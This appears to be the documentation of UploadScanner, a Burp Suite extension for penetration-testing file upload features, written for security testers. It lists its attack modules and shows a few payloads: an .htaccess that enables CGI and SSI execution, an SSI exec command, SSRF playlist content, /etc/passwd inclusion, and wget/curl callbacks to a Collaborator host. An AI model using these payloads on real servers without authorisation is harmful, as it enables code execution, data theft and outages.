A Burp Suite Pro extension to do security tests for HTTP file uploads.
Table of Contents
Testing web applications is a standard task for every security analyst. Various automated and semi-automated security testing tools exist to simplify the task. HTTP based file uploads are one specialised use case. However, most automated web application security scanners are not adapting their attacks when encountering file uploads and are therefore likely to miss vulnerabilities related to file upload functionalities.
While a lot of techniques used for file upload testing are documented throughout the web, the code necessary to automate such attacks is often missing. In other cases, the techniques only apply to very specific use cases. One of the goals of this research was to generalise and automate these attacks. The attack techniques include generic attacks such as Cross Site Scripting (XSS), External Entity Injection (XXE) and PHP/JSP/ASP code injection, but the goal is to execute these attacks customised for the use case of HTTP based file uploads. Additionally, more specific attacks on server side parsers are used as an attack vector, for example Server Side Request Forgery (SSRF) through m3u8 playlist file formats being parsed with LibAv.
File uploads on websites are an underestimated area for security testing. The attack surface on a server that parses files is automatically a lot bigger. While some of the issues that might occur get very high attention (eg. the ImageTragick vulnerability), there are countless memory corruption bugs that get fixed every day in various parses that might also be in use on your webserver. And while your REST XML web service might not be vulnerable to XML External Entity (XXE) injection, it doesn't mean your image parser for JPEG XMP metadata (which is XML) has no XXE issue.
Various techniques are necessary to successfully upload a file, including correlation of file extensions, content types, and content. Moreover, the file content has to pass server-side checks or modifications such as image size requirements or resizing operations. Circumventing processing on the server side, creating content that survives the modification or creating content that results in the desired payload after the modification is another goal of this extension.
While there are already a couple of Burp extensions doing some checks, this extension tries to implements most attacks that seem feasible for file uploads. The extension is testing various attacks and is divided into modules. Each module handles several attacks of the same category.
While the extension has various interesting features in its various modules, one of the main features is:
UploadScanner.py is the file you need to import into Burp, see Portswigger's support page on how to install an extension.
After installing the extension, check the "Global & Active Scanning configuration" tab of the extension. If a field is marked red, there is an error.
There are several tutorial videos available for the different topics that will help you get started. The UI of the extension changed a little since the videos were made, but it should be possible to get the basic ideas:
What's missing is a howto use Burp's Makro and session handling together with ReDownloader to get around aggressive XSRF-tokens (some XSRF-protections work out of the box with this extension).
This project was developed by Tobias "floyd" Ospelt, @floyd_ch, https://www.floyd.ch of modzero AG, @mod0, https://www.modzero.ch
However, we would like to acknowledge that this extension stands on the shoulder of giants. To develop this extension it was necessary to use techniques from all over the Internet. Very often the attacks in this extension simply copy work from other people. We try to acknowledge and reference their work here. If you are not listed on the following list but we used parts of your work, please let us know or send a pull request to add yourself. This list has no particular order:
Background information and FAQ for the UploadScanner extension.
To make sure we are talking about the same things, let's define some often used words you will encounter in the UI and source code of this extension. This extension centers about the following requests and their responses that are always sent in the following order:
The upload request includes the uploaded file content. Most upload requests also include a filename and content type specified by the user/browser. Sometimes websites also calculate the size of the file content in bytes and send it as another parameter. And sometimes all of that is missing and only the file content is uploaded. This extension can handle all these cases. When you do an upload of a specific file in the browser and send that request to the UploadScanner extension, that request and response pair is called the base request response (brr). The request part of the brr is either a multipart request (handled by the MultipartInjector class in the code) or it includes the file content somewhere in the body for example in a JSON parameter (handled by the FlexiInjector feature).
The only goal of the preflight request is to be able to create a ReDownload request by parsing the preflight response. It can be used when the upload response does not indicate where the file was stored on the server. So you might need to go to a different URL first (preflight request) to get the URL of the newly uploaded file.
The ReDownload response has to include the file content we uploaded.
For example:
avatar.png
as my new profile pictureGET /profile
<img src="https://example.org/RaNdOmLyChangingFooBar/avatar.png">
https://example.org/RaNdOmLyChangingFooBar/avatar.png
as redownload requestavatar.png
file contentavatar.png
indicates a vulnerabilityWhen we want to scan a file upload we need to ask the following questions:
The most likely scenario is that you made too many requests and were just blocked. Or you filled up the disc of the server with files. Another option is that an uploaded .htaccess file broke it as it conflicted with the global server settings. Or if you enabled the DoS module you asked for it. This extension broke certain SAP third-party modules in the past, you have been warned.
In most cases it is recommended to originally upload a file that is greater than 100 bytes through the proxy. This means the request you will send to the extension as the base request should include a file that is at least 100 bytes. As this extension has settings that try to find the file size in requests (enabled by default), the extension will only do a global search/replace of this number in the request if it's at least 100 bytes. Globally replacing numbers lower than '100' seems too error prone, eg. we don't want to replace any %23 included in the request just because the original uploaded file has coincidentially a length of 23.
File extensions are never varied in capitalization (eg. .ExE or such). I see little benefit in that, but source code modifications should be easy if you require this.
Like with nearly every other active scan implemented in Burp (or any other scanner for that matter), the extension is not able to scan websites that require more than one upload request for the file to be stored on the server. However, you could use Burp Makros to achieve this. But in general file uploads that require multiple requests or complex calculations (e.g. checksums over file content in upload requests) are out of scope of this extension. Feel free to let us know if you modified the source code to achieve this goal anyway.
Like with nearly every other active scan implemented in Burp (or any other scanner for that matter), the extension is also not able to scan upload requests which are not repeatable (eg. agressive CSRF protections).
Although this extension also runs under Burp Suite Community Edition, it has to skip all tests which use the Burp Collaborator feature. Additionally, it can only print issue summaries to stdout as no issues can be added inside Burp Suite Community Edition. So all in all this extension is pretty much useless in Burp Suite Community Edition.
At the moment the bmp image format is not supported, as the image libraries used in the extension do not support it. Tiff files are currently never resized, but might automatically start working when Burp and the extension is run with Java 1.9 or newer.
There are also a lot of TODOs in the code that are related to features that could be implemented.
In general web application security scanners have the following ways to detect issues:
All these detection mechnanisms have pro/cons and most of the time only some of them can be used at all.
One of the most important thing is to download uploaded files again to see how they were processed. The ReDownloader feature can help with this, but is only available when requests are sent to this extension via context menu. As detecting issues is complicated and servers can throw errors in various ways on bad input files, it is recommended to additionally install the Error Message Checks extension and the ResponseClusterer extension to catch unusual responses. Very very few tests of some of the modules of this extension do not even have an associated issue check and only rely on the above extensions. In the end, going manually through the responses in Logger++ will help to fully understand the mechanisms of the file upload. It will make the difference between running a tool blindly and doing a proper security test.
As a side note, please configure a private Burp Collaborator instance if your are doing a security analysis. Using the default Portswigger instance is simply unprofessional.
Detecting successful uploads automatically is hard. After executing this module you will need to redownload all files that were uploaded with a filename starting with "Dwld". This allows modules to see if the upload/download was successful and add corresponding scan issues. To help you with this you can use the Burp Spider, any other burp tool or use the ReDownloader feature of this extension.
Modern browsers can send file uploads in various ways. The classic way are multipart HTTP requests. Those are automatically detected and scanned during active scans with this extension. But what about customized JavaScript that uses the FileReader API to read the content and then send customize HTTP messages? Some web developers base64 encode the content in those HTTP messages and in general JSON is very popular as a format. For this case this extension has a functionality called FlexiInjector. The only thing you need to do is tell the FlexiInjector which file you are going to upload in the browser and which mime type the browser will set (this extension also tries to auto-detects the mime type). This extension will afterwards autodetect the filename, content and content-type in actively scanned requests. Even when it is base64/hex/url... encoded.
A lot of modules upload images and can resize them before uploading, so if the web application requires an image to have a certain size, you can simply configure it here. Having said that, some modules of this extension do not support image resizing as it either doesn't apply (what's the image size of a ImageTragick mvg?) or they are hand crafted images and their payload and purpose would be destroyed when resizing. If it finds a suitable exiftool binary, this extension will use exiftool on the shell to plant PHP, JSP, XXE, SSI and other code in various image metadata locations (keywords, comment, ipct:keywords, xmp:keywords, exif:ImageDescription, ThumbnailImage). It currently supports injecting metadata in gif, png, jpeg, tiff, pdf and mp4 files. If you don't have exiftool installed and the shipped binaries do not work the extension will simply not do these tests. The easiest way is to have a binary (or symlink) called "exiftool" in your $PATH. The other option is specifying an absolute path in the extension's UI if it is really not found (rare these days).
The ReDownloader allows to automatically download files again in most cases. When we send the upload request and the response includes a URL where to find the file or the URL is static, the extension can parse the URL from the response. You will need to specify a start marker and end marker in which the URL is located in the response. If the markers are not found then no download of the file is attempted. If the markers are found, a request to the configured prefix plus parsed URL plus configured suffix is sent. The extension autodetects if this created URL starts with http[s]://
or not to make sure relative or absolute requests are sent. You can use ${FILENAME}
in prefix and suffix and other field where indicated for where the correctly encoded filename should be put. This feature is only available when requests are sent to the extension via context menu. The UI will show you when you misconfigured certain parameters and when it's ready to test. This feature is especially helpful when the same file on the server is overwritten each time a file is uploaded (e.g. common for avatar image uploads).
Keep in mind that for every successful upload that has the marker in the response, another request is sent. Therefore, this feature will make the extension send a lot more requests. This feature is enabled as soon as you specify a start and an end marker. Alternatively to the parsing approach you can specify a static URL path where the file can be redownloaded. This will potentially generate even more requests than the marker approach.
If you specify markers for the response parsing approach, they will be used instead of the static URL (markers take precedence). Currently I would claim that this allows to configure an automatic download in most situations. Sometimes you have to configure Burp Makros along with it, which can be quiet complex sometimes.
Most of the features were incrementally added as they were needed when running the extension against bug bounty program websites. This was done to make sure the features allow scanning real-world web applications. As most bug bounty programs usually exclude automated scanners, the scans for each website took place over several days by specifying the according throttle of requests in the settings and by changing the code to abort the scans if too many errors were returned. The extension was run against:
However, as new features were added to the UploadScanner in the meantime, it might even make sense to rescan the above bounty programs.
Moreover, the extension was run in Burp on MacOS and Windows. See the Limitations section for things that did not work during the tests.
A very important rule is: Don't configure things you don't need. The default values are the sane choices. While the UI looks huge, most parts do not need configuration unless you want to achieve a specifc goal. The UI will also complain and mark things in red that are configured incorrectly.
Moreover, the global and active scan configuration tab will be used as the default configuration for any scans sent via context menu.
The UI that shows the requests additionally supports a small feature that allows randomizing a certain part of the upload request. If the marker ${RANDOMIZE}
(which has a length of 12 characters) is included in the upload request, this marker will be replaced by a random 12 digit number in each request that is sent by the extension. On a side note, the last dash delimited number of a UUID is also 12 digits, so this is a helpful feature if a server requires the client to send a random, unique UUID in requests.
By deactivating modules it is possible to make the extension send less files to a server. Additionally this order of how the modules are executed might be important for you if you stop a scan and would like to restart it but without having to do all the modules again. You can either check the output of the extension in the Extender tab to see what the extension is doing or check Logger++ as the filenames usually include a hint which module is sending which request.
In the global configuration tab this defines, if request should be created that upload images, pdfs, zip files and so and pass them to Burp's Active Scan (and other extensions) as insertion points. The individual insertion points are the different metadata locations of the files. This means, that Burp (and all other Burp extensions) can do their active scan checks on those uploads. Additionally, this feature will now also detect if a user uploaded a CSV file and will provide the line with the most values as insertion points to Burp (each field individually) while trying to do escaping for quoted CSV formats. In the global configuration this option is enabled by default. Over time another injection provider was developed, putting all active scan payloads into JPEG and PNG images, so they might get picked up by server-side OCR implementations.
If you send a request manually to the UploadScanner via context menu, this option will pass the request to the Burp Active Scanner. For context menu invocation options this is disabled by default (as it is assumed that you might have already active scanned this request). If you checked this option in the global options, then the above described scans will be done as well.
The imagetragick module uploads command injection with the sleep (Unix payload) and ping (Windows) command (CVE-2016-3714) and checks for a timeout (in-band). It has additional checks via burp collaborator interactions with wget, curl (Unix) and ping (Windows). These issues are tested with MVG and SVG files.
Additionally it checks for SSRF (CVE-2016-3718) via Burp collaborator URLs (out-of-band) as MVG files.
Quoting from the manuals: "Precede the image file name with | to pipe to a system command". Tries to execute nslookup payloads (or wget/curl/rundll32) to get burp collaborator DNS interactions. It send the original file content from the base request.
The ghostscript module uploads files including command injection as described in CVE-2016-7976 and CVE-2017-8291, with nslookup payloads (or wget/curl/rundll32) to check for Burp Colaborator interactions. It also tries to include /etc/passwd in a file. The files are in the postscript format starting with %!PS.
The LibAvFormat module uploads an m3u8 file that has an external reference, so it can check for SSRF via Burp collaborator URLs (out-of-band). It also does the same with a m3u8 file embedded into an avi file. The m3u8 data looks like this:
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
http://example.org/example.mp4
##prevent cache: RANDOM
#EXT-X-ENDLIST
The PHP code module uploads images which include server side PHP code as a filename with single and double extension (eg. .php.png). It also uploads very simple files that only include PHP code. This could potentially trigger RCE as described on hackerone. It also tries phtml and php5 file extensions. It has one special case where it tries to inject code directly into the GIF image content (not metadata) as described on secgeek. Additionally, it has partialy implemented a trick using PNG idate chunks as explained on idontplaydarts.
The JSP code module uploads images which include server side JSP code as a filename with single and double extension (eg. .jsp.png). It also uploads very simple files that only include JSP code. The attacks use the <% %> syntax and the ${} expression syntax as well as the JSPX xml syntax.
The ASP code module uploads images which include server side ASP code as a filename with single and double extension (eg. .jsp.png). It also uploads very simple files that only include ASP code. The attack use the <%= %> ASP syntax. It has one special case where it tries to inject code directly into the GIF image content (not metadata) as described on secgeek.
The htaccess module tries to upload .htaccess files, hoping that it will be interpreted by the server. The content of the htaccess will enable Server Side Includes (see also next module) and will also enable directory listings. This module is run before the SSI module to make sure it has a better chance to achieve code execution. The htaccess file content looks like this:
Options +Indexes +Includes +ExecCGI
AddHandler cgi-script .cgi .pl .py .rb
AddHandler server-parsed .shtml .stm .shtm .html .jpeg .png .mp4
AddOutputFilter INCLUDES .shtml .stm .shtm .html .jpeg .png .mp4
Additionally, this module will upload a web.config file that is similar to what htaccess files do, but for Windows IIS servers.
The CGI module uploads Perl, Python and Ruby files that might get executed if the server has configured CGI or if the htaccess module was able to enable it. In general this module is unlikely to succeed, as the uploaded files have to be executable (chmod +x).
Executing commands on the server with the <!--#exec cmd="nslookup test.example.org" -->
SSI syntax by uploading simple files including only such payloads. It tries to achieve this by exeucting nslookup (or wget/curl/rundll32) and finding the DNS response in the HTTP response. Another test tries to find Edge Side Include (ESI) by using the esi:include syntax with a Burp collaborator URL.
Uploads SVG files having Xlink with burp collaborator URLs. It also uploads an XML with an entity pointing to /etc/passwd. Furthermore generic XXE XML techniques are applied to the SVG with Burp collaborator URLs. The generic XXE XML techniques include DTD specification in the DOCTYPE, XML XSL stylesheet reference in a xml-stylesheet tag, SYSTEM Entity in the DOCTYPE and usage of that entity inside the DOCTYPE, SYSTEM Entity in the DOCTYPE and usage of that entity inside the XML itself, Xinclude by using a xi:include tag and injection into Schema location specifications. The tag used to inject the payloads is a standard text tag.
It is as well sending a script tag of type application/java-archive inside an SVG using a Burp collaborator URL in the xlink:href attribute. This idea was taken from a metasploit module.
It then also uploads XML files, which have all the generic XXE XML techniques applied as explained above. The tag used to inject the payloads is a tag called tagtest, defined in the DOCTYPE.
The next step is to upload Microsoft Office documents (Excel and Word) in the modern format of zipped XMLs. The techniques explained above that inject into the DOCTYPE are applied to all XMLS found in the default Office zip first. In further uploads they are applied only to the main content XML file (document.xml or workbook.xml). The techniques explained above that use tags are then applied to the core.xml file which includes the dc:creator tag.
As a last step various images in different image formats with XMP metadata are produced. The XMPs include the above discussed XXE attacks with Burp Collaborator URLs.
This modules tries to upload a simple file with HTML content first. It then tries to upload a SVG file with a script tag executing JavaScript. It also uploads a Flash swf file that could lead to XSS. Afterwards, for some image formats the metadata trick is used again to include HTML in the metadata of image files.
The content-type of the responses are checked, so that less false positives are flagged if the browser wouldn't execute the included JavaScript (e.g. if image/png is returned).
The eicar module uploads the eicar antivirus test file and adds a scan issue if you download that file again. If uploaded and downloaded successful, it means there is probably no antivirus installed on the server.
This module uploads a PDF file that includes JavaScript that could be executed in a PDF reader. An issue is added if the PDF can be downloaded again or if the server requests the included Burp Collaborator URL. The same checks are done for the BadPDF vulnerability. Various other PDFs that do similar checks are uploaded as well.
The other SSRF module will upload files that can be used to achieve other Server Side Request Forgeries that are not covered in other modules. Currently, this module only uploads .URL files, which might lead to SSRF SMB connections on Windows if opened.
This module uploads malicious CSV and spreadsheet (Microsoft Excel) files as described on the contextis blog. If the files can be downloaded again, an issue is added to Burp. Additionally, it will detect if an uploaded file was a CSV file. If that is the case, it detect the delimeter, look for the line with the most values and provide each value as an insertion point to the Burp active scanner.
Uploads zip files that have path traversal payloads in the filenames of the zip file entries. A little a shot in the dark as I haven't seen a zip implementation unpacking zip files resulting in path traversal vulnerabilities, but you never know. This could be helpful if a server unpacks zip files.
The polyglot module uploads CSP bypass JPEG/JS polyglots and adds a scan issue if you download that file again. See the Burp blog post for the JPEG/JavaScript polyglot and the thinkfu blog post for the GIF/JavaScript polyglot. Moreover, the module will upload corkami's corcamix PDF/Jar/HTML/JavaScript/PE polyglot because it simply rocks and because it can be used as a CSP bypass proof of concept as well. As it is also a JAR file, in the good old days of Java applets this might have caused additional troubles. In the end it also uploads a simple JavaScript/zip polyglot.
This module is only available when a request is sent to UploadScanner via context menu and when the ReDownloader feature is configured.
The fingerping tool is able to fingerprint images libraries that modify a set of png files that are uploaded. The original project is located on 0xcite fingerprint page on github and the fork that is used in this extension on floyds fingerping page on github.
Knowing the server side image parser is important to do a security test, for example to check for an old version or to go back and fuzz the parser, then exploit it on the server. The result of the fingerping run is given from a score out of 60, where the last line is the most likely match. This module also often triggers error 500 or error 400 codes.
This module creates an informational finding if it is able to download enough images to fingerprint.
It would be very nice to get some more fingerprints of image libraries for this module, that's why the finding will also include a fingerprint you could submit if you know the exact version of the image library used on the server.
Sends special filenames with the original file content to the server. These special filenames include Unicode left-to-right overwrite characters, semicolons, RFC 2047 encoding and null truncated names. It adds a scan issue if you download one of those files again.
Additionally, filenames with a very long name, all bytes between 0x01 and 0x1f, all bytes between 0x20 and 0x2f or UTF-16 with Byte Order Marks (BOM) are uploaded. Some additional filenames include forbidden filenames on Windows (COM1
), the single dot (*
), the asterix (*
) or filenames with Windows CLSIDs (test.{D20EA4E1-3957-11d2-A40B-0C5020524153}
).
Changes all http and https URLs detected in the originally uploaded file content in the base request. It changes all URLS to burp collaborator payloads. However, this module is not file format aware, therefore might produce invalid file formats.
Disabled by default. This module features its own UI elements once it's enabled. It reads all files in a user supplied directory (and subdirectories) and uploads them (filename, content, content-type) to the server. It tries to guess the mime type correctly. This module can be used to upload your own collection, for example files from offline fuzzing runs. Or you use a collection that can be found on the web, such as:
This module's functionality is similar to the Burp Intruder File Upload Generator extension, but it tries to guess the correct content type to include in the HTTP request and automating the entire approach a little further.
Disabled by default. This module features its own UI elements once it's enabled. Do random bit or byte mutations on the originally uploaded file in the base request or inject well-known fuzzing strings. Good luck! This might get really useful as soon as you test servers that have weird parsing libraries for exotic file formats or webservers on embedded devices and so on. Or for the bored pentester to see if the website might struggle with corrupt files.
Disabled by default. Attention, this module is dangerous. Samples can lead to memory exhaustion, high disc usage and/or segmentation faults and other crashes. This brought down big websites before. During tests the scanner thread in Burp was simply stuck for more than a minute. In other cases when scanning the same server with multiple threads, the entire scan check stays stuck forever. You have been warned. It mainly uploads files that are known to crash image parsers such as ImageMagick, GraphicksMagick or Python Image Library (PIL). These are partially "0days" aka "I just fuzzed them with AFL" crashes. It also uses silly things such as fork bombs as imagetragick payloads.
Modules are only sending file formats that are enabled in these UI settings. This is another possiblity to make the extension send less files to a server. Each of the file formats should be self-explanatory.
These are general options that can be modified for each UploadScanner scan.
The extension saves all settings. When checking this checkbox, it will delete all project-specific settings of the UploadScanner extension on the next reload. This includes DownloadMatchers, the extension-internal scope definition, all Burp collaborator instances and the requests sent via context menu. The extension can be reloaded in the Extender tab of the Burp UI. However, it will keep the extension-specific settings, which are all those configured in the "Global & Active Scanning configuration" tab.
This UI option is only shown when the extension couldn't find exiftool on your system and couldn't use one of the shipped binaries.
This extension executes the exiftool on the command line and comes with two exiftool binaries (plain Perl and Windows exe). It will try to use your installation of exiftool first, but make sure your exiftool binary is called only "exiftool" (not "exiftool-5.24") and is in your $PATH.
You can specify the name of the exiftool binary in your $PATH or you can specify an absolute path in this UI option. This field will be marked in red if the exiftool binary could not be found.
Burp global options for active scan throttling are not used for extensions up to Burp version 1.7.32, therefore this parameter allows to configure such a throttle before 1.7.32. Also, if you start the scan from the context menu of UploadScanner, the scan is not categorized as an active scan and therefore this throttle still allows you to throttle requests.
When using sleep based payloads where we expect the server to delay the delivery of the response during a successful attack, this sleep time is used. As websites usually have different response times, this value might be too high or too low for the tested website.
Enable this option if you want to log all requests done by the extension in the "Done uploads" tab. You can also just use the Logger++ extension instead. This log is never persisted and cleared when the UploadScanner extension is reloaded.
Some websites include the filename as an additional multipart parameter (eg. Slack). So the filename is not only specified in the mutlipart parameter called "filename", but there is a separate multipart that includes only the filename. Therefore, these file uploads are sending the name in two parameters in the request. Other websites might include it in another JSON or URL parameter. By default the extension will do an additional search/replace of the original filename in the base request.
See last option. Sometimes the content type is specified in multiple locations in requests.
See last option. Some websites (e.g. github avatar picture upload) include the size of the uploaded file in bytes in another multipart of the request. It is recommended to make sure that the original file size in the base request is over 100 bytes, otherwise this feature is ignored, see the "Limitations" sections.
Usually when you configure Burp Collaborator with a DNS name, we will send Remote Command Execution (RCE) payloads such as nslookup payload.private.collaborator.example.org
. As nslookup works on Windows and Unix, this way to identify DNS interactions should work fine for most cases and is the default. However, when you configure Burp Collaborator to an IP address, the payloads will be something like 192.168.0.15/payload
and obviously DNS interactions can not be detect. Therefore this extension will automatically switch to using curl, wget and rundll32 payloads when it detects that the Burp Collaborator is IP based. Sometimes it is inevitable to use an IP based Burp Collaborator, for example if you are on a test environment without DNS and without Internet access.
This option allows to enable curl, wget and rundll32 instead of nslookup when you use a DNS based Burp Collaborator. This might make sense if you think the server is not allowed to do nslookups, but maybe it is allowed to connect to the outside world via a proxy. In that case you might get lucky and curl, wget or the browser opened with rundll32 have a proxy configured.
This setting or a IP-based Burp Collaborator is making the extension send three times as many files for RCE payloads.
So if you want the most thorough scan you can get and you have a DNS based Burp Collaborator, you have to run the entire extension twice, once with and once without this option.
FlexiInjector allows detecting file uploads, even if no HTTP multipart request is used.
To detect files in non-multipart forms, specify the file that is included in the base request.
You need to specify the mime type of the file specified in the previous option. It's important that it is the same mime type as the one specified in the base request.
As this extension generates a lot of images, it will use the specified width and height to generate images where possible. As an additional feature the extension will also color the files differently, so if you render the files they have a uniform random color. However, as modules will reuse the same file content, the colors do not change in every request.
Are only shown when request are sent to the UploadScanner manually. The ReDownloader feature is never used for active scans.
In most of these options you can use the placeholder ${FILENAME}
, which will be replaced with the filename that was uploaded.
The UI of the UploadScanner will create a preview of the request in the UI as soon as your configure it correctly.
The most important thing is that you press the button "Send ReDownload request" once you've configured this feature. The button "Start scan without ReDownloader" will change to "Start scan with ReDownloader" as soon as you configured everything correctly.
If you need to send a preflight request to find out where a file was stored, you can specify an absolute or relative URL here.
The leading 1. and 2. specify the two options you have to configure the ReDownloader. Do not configure both. If you can, prefer to configure the first version with the start and end marker.
Let's say the upload response includes the following JSON:
{"status":"success", "FileLocation":"https:\/\/cdn.example.org\/RaNdOmLyChangingFooBar\/avatar.png"}
Then your start marker for parsing would be:
"FileLocation":"
To achieve maximum flexibility (e.g. because with literal values in this UI field you can not indicate a newline), the extension also supports another mechanism. To use this other mechanism you have to start your input with ${PYTHONSTR:
followed by a Python and string and ending the input with }
.
The Python string has to be able to be parsed by Python's ast.literal_eval. Additionally literal_eval has to return a string for your input. So the equivalent of the start marker for the above example would be:
${PYTHONSTR:'"FileLocation":"'}
Let's say we need a start marker for a more complicated response:
status: success
https://cdn.example.org/RaNdOmLyChangingFooBar/avatar.png
size: 1MB
You would be able to use a start marker such as:
${PYTHONSTR:"success\n"}
Make sure you use the right newline type. It's also possible to use \x41 hex encoding in these strings.
Let's say the upload response includes the following JSON:
{"status":"success", "FileLocation":"https:\/\/cdn.example.org\/RaNdOmLyChangingFooBar\/avatar.png"}
Then your end marker for parsing would be:
"}
This UI field also supports the ${PYTHONSTR:'"}'}
syntax explained for the start marker.
Let's assume you configured the previous two options to parse the following URL from the JSON upload response:
{"status":"success", "FileLocation":"https:\/\/cdn.example.org\/RaNdOmLyChangingFooBar\/avatar.png"}
As the URL is escaping slashes, you will need to enable this option. This kind of encoding is very common.
Let's say you sent the upload request to the server www.example.org
and the upload response includes the following JSON:
{"status":"success", "FileLocation":"/RaNdOmLyChangingFooBar/avatar.png"}
However, you know that this URL is relative and that the avatar is not located on www.example.org
(default assumption of this extension), but on cdn.example.org
. In this case you can specify the start marker and end marker for the parsers and then configure this URL prefix as:
https://cdn.example.org
So after receiving the upload response, the extension knows that prefix plus parsed part is the file location:
https://cdn.example.org/RaNdOmLyChangingFooBar/avatar.png
See last option. This can be used for example if you would like to add something after the parsed part. For example the following upload response is correctly parsed:
{"status":"success", "FileLocation":"https://cdn.example.org/RaNdOmLyChangingFooBar/avatar.png"}
But you know that the CDN will require the URL parameter token=UserSessionSecretToken you can specify it in this field:
?token=UserSessionSecretToken
So after receiving the upload response, the extension knows that parsed part plus suffix is the file location:
https://cdn.example.org/RaNdOmLyChangingFooBar/avatar.png?token=UserSessionSecretToken
Instead of configuring a parser that parser the upload response or the preflight response, you can also only configure this option. If you have a static URL where the file will land you can configure it here, for example:
https://www.example.org/uploads/${FILENAME}
These UI settings are only shown once the fuzzer module was activated in the modules section. The module allows specifying which folder's content should be uploaded and if the filename, file extension or mime type should be kept from the base request. Additionally, it allows applying the generic URL replacer module to these files as well.
These UI settings are only shown once the fuzzer module was activated in the modules section. Both options allow to configure how many fuzzing requests should be sent.